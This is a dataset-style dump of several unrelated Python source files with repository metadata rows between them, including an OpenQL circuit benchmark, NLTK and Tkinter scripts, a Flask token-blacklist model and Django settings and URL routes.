k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[2])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('h',[2])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[1])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[1])
k.gate('cnot',[10,0])
k.gate('cnot',[1,10])
k.gate('cnot',[0,1])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[1])
k.gate('cnot',[1,10])
k.gate('cnot',[0,1])
k.gate('cnot',[10,0])
k.gate('h',[1])
k.gate('cnot',[10,0])
if measurement:
for q in range(num_qubits):
k.gate('measure', [q])
p.add_kernel(k)
p.compile()
ql.set_option('mapper', 'no')
if __name__ == '__main__':
    # Command-line entry point: parse OpenQL compilation options and compile
    # this benchmark circuit with the requested scheduler/mapper settings.
    parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
    parser.add_argument('config_file', help='Path to the OpenQL configuration file to compile this algorithm')
    parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
    parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
    # Fixed help-text typo ("shceduler actication" -> "scheduler activation").
    parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform scheduler activation (yes or no)')
    parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
    parser.add_argument('--mapper', nargs='?', default='base', help='Mapper specification (base, minextend, minextendrc)')
    parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
    parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
    parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
    parser.add_argument('--out_dir', nargs='?', default='test_output', help='Folder name to store the compilation')
    parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
    args = parser.parse_args()
    try:
        # NOTE(review): args.measurement is parsed above but not forwarded to
        # circuit(); presumably circuit() applies its own default -- confirm
        # against the circuit() signature defined earlier in this file.
        circuit(args.config_file, args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
    except TypeError:
        # Raised by OpenQL when a gate used by the circuit is missing from the
        # configuration file; report it and re-raise so the failure is visible.
        print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
        raise
"alxmorais8@msn.com"
] | alxmorais8@msn.com |
07d1ecadbb9f0f08dcae92d18b383b664a3c2a0b | 273174584337339f2bd90660f4a2f72a0f11f1ef | /garbage_collection_test.py | ef6b7f83f10e812aad2d254dd5cc86dc8ca65df3 | [] | no_license | plutokaito/python_project-based | a37d917c14a0b2923562a5d26d4ea06d6a91c574 | 2cb8011f29dc543ce2f515787a847e36782bee62 | refs/heads/master | 2020-05-31T21:15:22.727731 | 2019-07-18T00:50:02 | 2019-07-18T00:50:02 | 190,493,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,489 | py | #%%
import os
import psutil
# 显示当前python程序占用的内存大小
def show_memory_info(hint):
pid = os.getpid()
p = psutil.Process(pid)
info = p.memory_full_info()
memory = info.uss / 1024. / 1024
print('{} memory used: {} MB'.format(hint, memory))
def func():
show_memory_info('initial')
a = [i for i in range(100000000)]
show_memory_info('after a created')
def global_param_func():
show_memory_info('inital')
global b
b = [i for i in range(10000000)]
show_memory_info('after a created global')
func()
global_param_func()
show_memory_info('finished')
#%%
import sys
a = []
print(sys.getrefcount(a))
def func(a):
print(sys.getrefcount(a))
func(a)
print(sys.getrefcount(a))
#%%
import sys
a= [1]
print(sys.getrefcount(a))
b = a
print(sys.getrefcount(a))
c,d,e,f,g,h = b,b,c,e,d,a
# d = b
# e = c
# f = e
# g = d
print(g)
print(sys.getrefcount(a))
#%%
import gc
show_memory_info('initial')
a = [i for i in range(10000000)]
show_memory_info('after a created')
del a
gc.collect()
show_memory_info('finish')
print(a)
#%%
## 循环引用
def func():
show_memory_info('initial')
a = [i for i in range(100000000)]
b = [i for i in range(100000000)]
show_memory_info('after a,b created')
a.append(b)
b.append(a)
func()
gc.collect()
show_memory_info('finished')
#%%
import objgraph
a = [1, 2, 3]
b = [4, 5, 6]
a.append(b)
b.append(a)
objgraph.show_refs([a])
objgraph.show_backrefs([a])
#%%
| [
"ss@ecrrc.com"
] | ss@ecrrc.com |
77169cfad7dd0a3c212d00a1d47a8ee2d9202fbc | 10caf45befd52bfe14dcb9043b17d6afd6f31fee | /2018/python/day_15/part_2.py | eb7063c087849690e503e99e4d9c089dab81f9e7 | [] | no_license | lordievader/advent_of_code | bd31b44b0d7f8ee99735a6c91209a57caa8c3a4b | b1d6c5d01e1162fdfc3c3e8325b08c8037561abd | refs/heads/master | 2020-04-09T04:45:16.273683 | 2019-12-20T09:02:51 | 2019-12-20T09:02:51 | 160,035,108 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | """Code for part 1 of day 05.
"""
import logging
import numpy
import re
import pdb
import part_1
logging.basicConfig(
format='%(asctime)-23s %(funcName)15s: %(message)s',
level=logging.DEBUG
)
def rolling_window(a, window=5):
"""Returns the array a in chunks of window size.
:param a: numpy array
:type a: numpy.ndarray
:param window: window size
:type window: int
:return: numpy.ndarray
"""
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return numpy.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
def found(problem_input, look_for, window=5):
"""Is the sequence to look for in the problem_input?
:param problem_input: current state
:type problem_input: numpy.ndarray
:param look_for: what to look for
:type look_for: numpy.ndarray
:return: boolean
"""
if len(problem_input) < window + 1:
is_found = False
elif problem_input[-window:] == look_for:
is_found = True
elif problem_input[-window-1:-1] == look_for:
is_found = True
else:
is_found = False
return is_found
def solution(look_for):
"""Solution to part one.
"""
look_for = [int(x) for x in look_for]
window = len(look_for)
problem_input = [3, 7]
elves = numpy.arange(2)
while found(problem_input, look_for, window) is False:
problem_input = part_1.next_generation(problem_input, elves)
return len(problem_input) - window
| [
"oliviervdtoorn@gmail.com"
] | oliviervdtoorn@gmail.com |
23ccf2a38ceba58839bf1b43a47e9b8c981bd395 | 2b55313ef753f6af072414df397d89bc04507366 | /src/hpp/corbaserver/hpp_ompl_benchmark/cubicles/robot.py | c4956fa350590552330a3f08510f0dd0b857576e | [] | no_license | anna-seppala/hpp-ompl-benchmark | decb6bc18b86aa08a7ea6d28a114b01ca813bd76 | 2fc62bb432850620aa4a027d97d915dad00dabb3 | refs/heads/master | 2021-01-10T13:49:24.808239 | 2016-03-07T16:49:56 | 2016-03-07T16:49:56 | 52,097,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # Copyright (c) 2015 CNRS
# Author: Anna Seppala
#
# This file is part of hpp-ompl-benchmark.
# hpp-ompl-benchmark is free software: you can redistribute it
# and/or modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# hpp-ompl-benchmark is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Lesser Public License for more details. You should have
# received a copy of the GNU Lesser General Public License along with
# hpp-ompl-benchmark. If not, see
# <http://www.gnu.org/licenses/>.
from hpp.corbaserver.robot import Robot as Parent
class Robot (Parent):
packageName = "hpp-ompl-benchmark"
urdfName = "cubicles_robot"
urdfSuffix = ""
srdfSuffix = ""
def __init__ (self, robotName, load = True):
Parent.__init__ (self, robotName, "freeflyer", load)
self.rightWrist = ""
self.leftWrist = ""
| [
"seppala@laas.fr"
] | seppala@laas.fr |
80829806b360fe54ece15c5e61cdd9365b477f5c | e77104058b073f3ebe1b169e6cde8439774864dc | /nerWithInputFun.py | 88bac0cb3ca37a8722f5f7101501fd457ff51c09 | [] | no_license | robincamille/replacethechar | fffda864003037ac1690fa74fbd066bb6d1f02c1 | 4b2f642bb5044df224f67b6f082d1ff885709ecb | refs/heads/master | 2021-01-10T05:15:35.492399 | 2016-01-17T00:42:56 | 2016-01-17T00:42:56 | 49,334,611 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Robin Camille Davis
# CODEX 2016
# Top 5 names from a .txt file
##This script asks for the URL to a plain-text file (Project Gutenberg).
##It outputs the top 5 person names from the text using the
##Stanford Named Entity Recognition interface in NLTK.
##
##Caveats: first/last names and honorifics not considered
import urllib2
import re
from nltk import tree
from nltk import word_tokenize as tok
from nltk import pos_tag as postag
from nltk import ne_chunk as ne
from nltk.corpus import gutenberg as gb
from collections import Counter
#import sys
#reload(sys)
#sys.setdefaultencoding("utf-8")
partition = 10000 #set to -1 for whole file
def returnNames(url):
theurl = "http://www.ccel.org/ccel/bible/kjv.txt"
#raw_input("URL to .txt file: ")
sourcefile = urllib2.urlopen(theurl)
source = sourcefile.read()
#Tokenize
sourcetok = tok(source[:partition])
#Tag POS
sourcetag = postag(sourcetok)
#Outputs POS-tagged text
sourcene = ne(sourcetag, binary=False)
charsall = []
for n in sourcene:
if type(n) == tree.Tree:
if n.label() == 'PERSON':
for m in n:
charsall.append(m[0])
#exclude from names:
honorifics = ['Mr.', 'Mrs.', 'Ms.', 'Miss', 'Dr.', 'Prof.', 'Professor', 'Lord', 'Lady', 'Sir', 'Madam', 'Dame', 'Rev.', 'Rabbi', 'Version', 'Gutenberg']
charsallnames = []
for s in charsall:
if s in honorifics:
pass
else:
charsallnames.append(s)
counted = (word for word in charsallnames if word[:1].isupper())
c = Counter(counted)
charscommon = c.most_common(5)
chars = []
for s in charscommon:
chars.append(s[0])
#print '\nMost common names:'
#print '\t'.join(chars)
return chars,source
#locfolder = r'C:\Users\SONY\SkyDrive\\'
locfolder = ""
locx = "20 books from gutenberg - Sheet1.csv"
with open(locfolder+locx,'r') as f:
rows=[L.strip().split(",") for L in f]
##for r in rows:
## for ri in r:
## print ri #page 1, input needs to be selected
## print
#index = int(raw_input("Enter the selected Book index ")) #selected i/p
def selecttext(index):
data = rows[index+2]
return data[0]
#print data[0], #page 2 book title
def printnames(index):
data = rows[index+2]
name,src = returnNames(data[2]) #data[2] is the url to be fetched
data.append(name)
return name #page 2, input to be typed in
## print data #print everything except src
## newTitle = raw_input(" Rename the Book ") #page 3
## auth = data[1]
## print (newTitle," by ", auth) #page 4 top
##def selectnames():
##
## newNames = []
## namesOfPpl = data[3] #d[3] is the names col
## for n in namesOfPpl:
## nn = raw_input("Enter the New Name for "+n)
## newNames.append(nn)
##
## print "Featuring "
def outputfile(newNames):
OutputFile = src
for i in range(5):
print newNames[i]," as : ",namesOfPpl[i] #page 4 complete
OutputFile = re.sub(namesOfPpl[i],newNames[i],OutputFile)
Out = open(newTitle+".txt",'w') #page 5
Out.write(OutputFile)
Out.close()
print "Done"
| [
"rdvs18@gmail.com"
] | rdvs18@gmail.com |
203cb029b27722baa806d4bf17e85a469268eba4 | 0660e3b841d662cb2de9631ec63dd9e5918824a3 | /test_quick_sort.py | a53726f8b93f68c5646d812403d1b5b7bdf3a3f9 | [
"MIT"
] | permissive | Jakeand3rson/new_data_structures | d41f304ac07aa952408d1f32d3d323846c0eace7 | ae6dff0bd90d76111a1ce3540f8a6396a6fd96ae | refs/heads/master | 2020-04-05T04:17:51.636597 | 2015-04-27T23:32:18 | 2015-04-27T23:32:18 | 32,335,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | from quick_sort import q_sort
import random
def test_sort_one():
x = range(10)
assert q_sort(x) == x
def test_sort_two():
x = range(10, 0, -1)
assert q_sort(x) == range(1, 11)
def test_sort_big():
x = range(100)
assert q_sort(x) == x
def test_sort_big_backwards():
x = range(100, 0, -1)
assert q_sort(x) == range(1, 101)
def test_sort_random():
x = random.sample(xrange(10000), 10000)
assert q_sort(x) == range(10000)
| [
"jake.anderson486@gmail.com"
] | jake.anderson486@gmail.com |
9f134b1aae3dcd607ae87d9adfd937cdc2e02809 | c9f45254dc20950eeae524157b69484f6babb9be | /.ipynb_checkpoints/ChatBot-checkpoint.py | 099888dad80b75e81e60421ec84bdd7ba64b7ef9 | [] | no_license | JivrajGrewal23/Assignment-2 | c3dc4fa6e7e765bf99a275dba591c6f9948173a1 | aad44942d89ae45148f4caafc0257120a8965fac | refs/heads/main | 2023-03-11T16:15:04.994973 | 2021-03-03T08:26:15 | 2021-03-03T08:26:15 | 343,925,730 | 0 | 0 | null | 2021-03-02T22:05:58 | 2021-03-02T22:05:58 | null | UTF-8 | Python | false | false | 5,292 | py | import nltk
import tkinter
from tkinter import *
from nltk.chat.util import Chat, reflections
# This is a modified converse function from nltk.chat.util
class modifiedChat(Chat):
def converse(self, user_input):
while user_input[-1] in "!.":
user_input = user_input[:-1]
return self.respond(user_input)
####################################################################
# The following is our chatbot implementation #
####################################################################
#this section is functions
#this function ends the window
def kill():
root.destroy()
#this function creates the menu
def makeMenu():
mainMenu = Menu(root)
mainMenu.add_command(label = "Quit", command=kill)
root.config(menu=mainMenu)
#This function retrieves the userInput and then passes it to the console
def sendClick():
userInput = mesWin.get("1.0", END)
mesWin.delete("1.0", END)
reply = chatbot.converse(userInput)
output = ""
chatWin.configure(state="normal")
if "To begin" in chatWin.get("1.0", END):
chatWin.delete("1.0", END)
output = userInput + "\n " + reply + "\n"
else:
output = "\n" + userInput + "\n " + reply + "\n"
chatWin.insert(END, output)
chatWin.see(END)
chatWin.configure(state="disabled")
#generate the and run the chat interface
def beginClick():
begin.destroy()
# place the Chat window
chatWin.place(x=6, y=6, height=385, width=562.5)
# place the message window
mesWin.place(x=128, y=400, height=88, width=440)
mesWin.place(x=6, y=400, height=88, width=440)
#Button to send your message
sendIn = Button(root, text="Send", width=12, height=5, bd=0, bg="#0080FF", activebackground="#00BFFF", foreground="#FFFFFF", font=("Arial", 12), command=sendClick)
sendIn.place(x=455, y=400, height=88)
#this section is where the GUI will be built
root = Tk()
root.title("Chatbot")
root.geometry("575x500")
root.resizable(width=FALSE, height=FALSE)
#this section is textboxes that will be placed by the beginClick function
#chat window
chatWin = Text(root, bd=1, bg="black", width=50, height=8, font=("Arial", 25), foreground="#00FFFF", wrap=WORD)
chatWin.insert(END, "To begin chatting type your message into the textbox on the bottom\n")
chatWin.configure(state="disabled")
#Message window
mesWin = Text(root, bd=0, bg="black",width="30", height="4", font=("Arial", 23), foreground="#00ffff")
#generate the menu at the top
makeMenu()
#these are conversation pairs
pairs = [
['Hello|Hi', ['Hi, what is your name?']],
['my name is (.*)', ['Hello %1, my name is sports bot. Do you play any sports']],
['(.*) play (.*)', ['Thats so cool! I used to play %2 as well. Do you watch %2?']],
['yes, i watch (.*)', ['Who is your favourite player?']],
['No, i do not watch (.*)', ['Really? What sport do you watch']],
['i watch (.*)', ['Who is your favourite player?']],
['my favourite player is (.*)', ['%1? I have never heard of him, how many points a game do they score?']],
['(.*) scores (.*)', ['Thats not too bad but I bet I could beat him 1 on 1']],
['No you could not', ['Yes I could, how many points can you score in your sport?']],
['Yes you could', ['I know, how many points can you score in your sport?']],
['I can score (.*)', ['You can score %1? How old are you?']],
['i am (.*) years old', ['I guess thats not bad for a %1 year old. Is there anything you want to ask me regarding sports?']],
['(.*) favourite sport?', ['Hockey, anything else?']],
['(.*) old are you?', ['I am a bot I do not age']],
['(.*) favourite player?', ['Loui Erikkson of the Vancouver Canucks, he definitely deserves his $36 million contract']],
['(.*) to a game?', ['No, I am a bot. I am unable to be physically anywhere.']],
['(.*) Stanley Cup this year?', ['Any team but Vancouver']],
['(.*) watch the game last night?', ['I did not watch it, but all the stats automatically uploaded to my personal hard drive']],
['(.*) next summer olympics?', ['This summer in Tokyo']],
['(.*) next winter olympics?', ['2022 in Beijing']],
['(.*) most gold medals?', ['Michael Phelps with 23.']],
['how are you?', ['I am well. And you?']],
['i am (.*)', ['Alright']],
['when is the next world cup?', ['Next year in Qatar']],
['who will win the next world cup?',['Canada, no doubt. They are a soccer powerhouse']],
['who are you', ['I am sports bot. It is my duty to assist you in anything related to sports.']],
['(.*) favourite team?', ['I have no allegiance to any sports organization']],
['(.*) favourite basketball player?', ['The legend Alex Caruso']],
['(.*) favourite goal of all time?', ['Any of Loui Erikksons empty nets']]
]
#Entry Screen
#When this button is clicked it will call the beginClick function to generate the chat interface
chatbot = modifiedChat(pairs, reflections)
begin = Button(text="Click me to begin chatting with SportBot!", width=400, height=500, bg="black", fg="white", command=beginClick, font=("Arial", 20))
begin.pack()
#when the code reaches this point it begins to loop a chat
root.mainloop()
| [
"brenden.trieu@gmail.com"
] | brenden.trieu@gmail.com |
4257aea07739c9ad349ae195f708c538e946c628 | 9a6c6f5defce5bf7e3deb2bdf692af92a0deceaf | /start_qt.py | 8a3f5d76199a103abd05d09df5bc3bca3ffaf509 | [] | no_license | henkburgstra/py-mvp | 608621af47b4d6f584eea0be31f4db41b54a1e4a | aa8a4f510ddd6e47a37fb8e9abeb7e4b7220d3bc | refs/heads/master | 2021-01-10T11:38:39.863445 | 2016-01-23T20:42:01 | 2016-01-23T20:42:01 | 49,984,275 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | #
# -*- coding: iso8859-1 -*-
# /start_qt.py
#
from ui.qt import mainwindow | [
"henk.burgstra@gmail.com"
] | henk.burgstra@gmail.com |
1eb7b01c1708fb87bed27c0f6ae70d133318cd9d | 9f3fc15f9f49b5de7030100b122cc386bfee0bb0 | /app/main/model/blacklist_model.py | 9eb0298de9c718f359d8421d2b9b61ca5c73e5df | [
"Apache-2.0"
] | permissive | priya7574/RestFul_API | 6ea484d8e50fd6aff4087d479db2a365e4c0de09 | 4a36b5836ca6e31074af3cf81532e824dfe7a016 | refs/heads/master | 2022-10-17T17:19:49.307100 | 2020-02-25T10:33:47 | 2020-02-25T10:33:47 | 242,972,452 | 0 | 0 | Apache-2.0 | 2022-09-16T18:19:10 | 2020-02-25T10:28:26 | Python | UTF-8 | Python | false | false | 814 | py | from .. import db
import datetime
class BlacklistToken(db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False | [
"priyabharti.impinge@gmail.com"
] | priyabharti.impinge@gmail.com |
605f661973bbbcd2a3ae449efe253b4c8fb5f8d1 | a3eb732ead7e1d10a85a88e42dc639eb16a40265 | /instagram_api/exceptions/login_required.py | 17efdeb06ecf91b72d2beb3c97a51eae69770f8a | [
"MIT"
] | permissive | carsam2021/instagram_api | 7654c0f485c22935cf478016e46e65acbeda9344 | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | refs/heads/master | 2023-03-16T14:06:27.515432 | 2020-10-17T04:39:19 | 2020-10-17T04:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | from .request import RequestException
class LoginRequiredException(RequestException):
pass
| [
"root@proscript.ru"
] | root@proscript.ru |
0222bfe5095a07c6e5891fcbff0ddf621a097feb | 191d53230f34d3394c34f08349181678e4f54be1 | /tourney/lookup.py | 58a0837d6c483a152a7bf84eea5770323c50391b | [
"MIT"
] | permissive | seangeggie/tourney | ea4719b7d267682ed09541668f4686de29175a83 | 405b6abd35d7501a094b3fd4a8d5fd215f073912 | refs/heads/master | 2020-03-27T05:08:24.911541 | 2018-09-11T10:53:53 | 2018-09-11T10:53:53 | 145,996,635 | 0 | 0 | MIT | 2018-08-24T13:58:08 | 2018-08-24T13:43:01 | Python | UTF-8 | Python | false | false | 968 | py | class Lookup:
def __init__(self, client):
self.__client = client
self.__all_channels = None
self.__all_users = {}
def channel_id_by_name(self, name):
self.__init_channels()
for channel in self.__all_channels:
if channel["name"] == name:
return channel["id"]
return None
def user_name_by_id(self, user_id):
self.__init_users()
if not user_id in self.__all_users:
return user_id
return self.__all_users[user_id]["name"]
def __init_channels(self):
if self.__all_channels is None:
self.__all_channels = self.__get_channels()
def __get_channels(self):
resp = self.__client.api_call("channels.list", exclude_archived=1, exclude_members=1)
return resp["channels"]
def __init_users(self):
if not self.__all_users:
for user in self.__get_users():
self.__all_users[user["id"]] = user
def __get_users(self):
return self.__client.api_call("users.list")["members"]
| [
"msk@nullpointer.dk"
] | msk@nullpointer.dk |
c46cd6e114a39fc11d11807b3df394c2a858b82a | b5a8f78d336beaa713f6ffc1d2dc7c4a0409bdfc | /helpdesk_proj/helpdesk_proj/settings/local.py | 48ff12cf1023fdb556ebd9abffb432fe4058883a | [] | no_license | ntrrgc/helpdesk | 9e90f9eaa0cbbeed7264169dc2e83b7678cf92ef | 30f924fd8cdeb65a2e73fb562ae185416c7ea7b3 | refs/heads/master | 2021-07-01T22:41:44.871650 | 2019-12-30T12:02:50 | 2019-12-30T12:03:24 | 33,888,221 | 0 | 0 | null | 2021-06-10T17:51:31 | 2015-04-13T19:11:20 | JavaScript | UTF-8 | Python | false | false | 967 | py | from .base import *
DEBUG = True
TEMPLATE_DEBUG = False
SECRET_KEY = 'dummy key'
SNORKY_BACKEND_URL = 'http://localhost:5002/backend'
SNORKY_FRONTEND_URL = 'ws://localhost:5001/websocket'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format' : "[%(asctime)s] %(levelname)s %(name)s %(message)s",
'datefmt' : "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': 'ext://sys.stdout'
},
},
'loggers': {
'snorky': {
'handlers': ['console'],
'level': 'DEBUG',
},
}
}
| [
"ntrrgc@gmail.com"
] | ntrrgc@gmail.com |
3bd8fc1258e19db21519b8c6f9f6d0805e198418 | 2b5a9c519df94942d58a519504336ab46287631a | /banners/templatetags/banners_tags.py | ec293521fa5d166eeec8b5b7cc35e1018bd1931c | [] | no_license | whitespy/djlime-banners | e106fd3d1276b16bce334dcfea6a746f9f9dbb2d | ffcd042069488d5127705931a759bfb828b318bd | refs/heads/master | 2021-05-19T21:27:17.524283 | 2012-07-23T13:29:31 | 2012-07-23T13:29:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,884 | py | from django.db.models import Q
from django.conf import settings
from django.template import Library
from banners.models import Banner
from banners import LOCATION_HEADER, LOCATION_CONTENT, LOCATION_SIDEBAR
register = Library()
CITY_CONTEXT_KEY = getattr(settings, 'CITY_CONTEXT_KEY', 'city')
BANNER_HEADER_TEMPLATE = \
getattr(settings, 'BANNER_HEADER_TEMPLATE', 'banners/includes/single_banner.html')
BANNER_CONTENT_TEMPLATE = \
getattr(settings, 'BANNER_CONTENT_TEMPLATE', 'banners/includes/single_banner.html')
BANNER_SIDEBAR_TEMPLATE = \
getattr(settings, 'BANNER_SIDEBAR_TEMPLATE', 'banners/includes/banners_block.html')
BANNER_COUNT_PER_SIDEBAR = getattr(settings, 'BANNER_COUNT_PER_SIDEBAR', False)
@register.inclusion_tag(BANNER_HEADER_TEMPLATE, takes_context=True)
def include_header_banner(context):
city = context.get(CITY_CONTEXT_KEY, None)
try:
banner = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_HEADER
).order_by('?')[0]
except IndexError:
banner = None
return {'banner': banner}
@register.inclusion_tag(BANNER_HEADER_TEMPLATE, takes_context=True)
def include_content_banner(context):
city = context.get(CITY_CONTEXT_KEY, None)
try:
banner = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_CONTENT
).order_by('?')[0]
except IndexError:
banner = None
return {'banner': banner}
@register.inclusion_tag(BANNER_SIDEBAR_TEMPLATE, takes_context=True)
def include_sidebar_banners(context):
city = context.get(CITY_CONTEXT_KEY, None)
banners = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_SIDEBAR
)
if BANNER_COUNT_PER_SIDEBAR:
banners = banners[:int(BANNER_COUNT_PER_SIDEBAR)]
return {'banners': banners}
| [
"whitespysoftware@yandex.ru"
] | whitespysoftware@yandex.ru |
cab7f3324eb0b7c8dba67533ab697b9dc6b85c1c | fcb27ecaf34f2fcd060ed378231efdb9620c5812 | /实例/2.py | 68ebb072a654e9a6d42b65afb59daeabd2ffff7e | [] | no_license | chainet/jerry | 3d8051e2451581ea85dd45a26f4ae39217d5a1c6 | 0a8c55d415fe8a6275b9615c0b102abc7cfc2162 | refs/heads/master | 2021-04-28T02:09:27.847423 | 2019-04-21T12:09:46 | 2019-04-21T12:09:46 | 122,295,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #实例2
#http://www.runoob.com/python/python-exercise-example2.html
def get_reward(I):
rewards = 0
if I <= 10:
rewards = I * 0.1
elif (I > 10) and (I <= 20):
rewards = (I - 10) * 0.075 + get_reward(10)
elif (I > 20) and (I <= 40):
rewards = (I - 20) * 0.05 + get_reward(20)
elif (I > 40) and (I <= 60):
rewards = (I - 40) * 0.03 + get_reward(40)
elif (I > 60) and (I <= 100):
rewards = (I - 60) * 0.015 + get_reward(60)
else:
rewards = get_reward(100) + (I - 100) * 0.01
return rewards
print("净利润:")
i = int(input())
if __name__ == '__main__':
print("发放的奖金为:", get_reward(i / 10000) * 10000) | [
"chainet@gmail.com"
] | chainet@gmail.com |
b8c9672e42c3bf90c709b694832601d20977efac | 14f455693213cae4506a01b7d0591e542c38de79 | /apps/profile/urls.py | ae3b903bd2e0bbdeddb2002969555017bac9927d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Cvalladares/Newsblur_Instrumented | f0b14d063759973330f202108a7eed3a29bcc033 | 4d6ee6aa9713879b1e2550ea5f2dbd819c73af12 | refs/heads/master | 2022-12-29T15:19:29.726455 | 2019-09-03T17:09:04 | 2019-09-03T17:09:04 | 206,130,022 | 0 | 0 | MIT | 2022-12-10T06:00:26 | 2019-09-03T17:07:04 | Python | UTF-8 | Python | false | false | 2,248 | py | from django.conf.urls import *
from apps.profile import views
# URL routes for the profile app (legacy Django ``patterns()`` syntax,
# removed in Django 1.10 — this file targets an older Django release).
# The regexes are deliberately unanchored at the end, so e.g.
# r'^set_preference/?' also matches longer paths with that prefix.
urlpatterns = patterns('',
    url(r'^get_preferences?/?', views.get_preference),
    url(r'^set_preference/?', views.set_preference),
    url(r'^set_account_settings/?', views.set_account_settings),
    url(r'^get_view_setting/?', views.get_view_setting),
    url(r'^set_view_setting/?', views.set_view_setting),
    url(r'^clear_view_setting/?', views.clear_view_setting),
    url(r'^set_collapsed_folders/?', views.set_collapsed_folders),
    url(r'^paypal_form/?', views.paypal_form),
    url(r'^paypal_return/?', views.paypal_return, name='paypal-return'),
    url(r'^is_premium/?', views.profile_is_premium, name='profile-is-premium'),
    # NOTE(review): the two routes below include the *same* ipn urlconf under
    # different prefixes — confirm the webhooks alias is intentional.
    url(r'^paypal_ipn/?', include('paypal.standard.ipn.urls'), name='paypal-ipn'),
    url(r'^paypal_webhooks/?', include('paypal.standard.ipn.urls'), name='paypal-webhooks'),
    url(r'^stripe_form/?', views.stripe_form, name='stripe-form'),
    url(r'^activities/?', views.load_activities, name='profile-activities'),
    url(r'^payment_history/?', views.payment_history, name='profile-payment-history'),
    url(r'^cancel_premium/?', views.cancel_premium, name='profile-cancel-premium'),
    url(r'^refund_premium/?', views.refund_premium, name='profile-refund-premium'),
    url(r'^never_expire_premium/?', views.never_expire_premium, name='profile-never-expire-premium'),
    url(r'^upgrade_premium/?', views.upgrade_premium, name='profile-upgrade-premium'),
    url(r'^save_ios_receipt/?', views.save_ios_receipt, name='save-ios-receipt'),
    url(r'^update_payment_history/?', views.update_payment_history, name='profile-update-payment-history'),
    url(r'^delete_account/?', views.delete_account, name='profile-delete-account'),
    url(r'^forgot_password_return/?', views.forgot_password_return, name='profile-forgot-password-return'),
    url(r'^forgot_password/?', views.forgot_password, name='profile-forgot-password'),
    url(r'^delete_starred_stories/?', views.delete_starred_stories, name='profile-delete-starred-stories'),
    url(r'^delete_all_sites/?', views.delete_all_sites, name='profile-delete-all-sites'),
    url(r'^email_optout/?', views.email_optout, name='profile-email-optout'),
)
| [
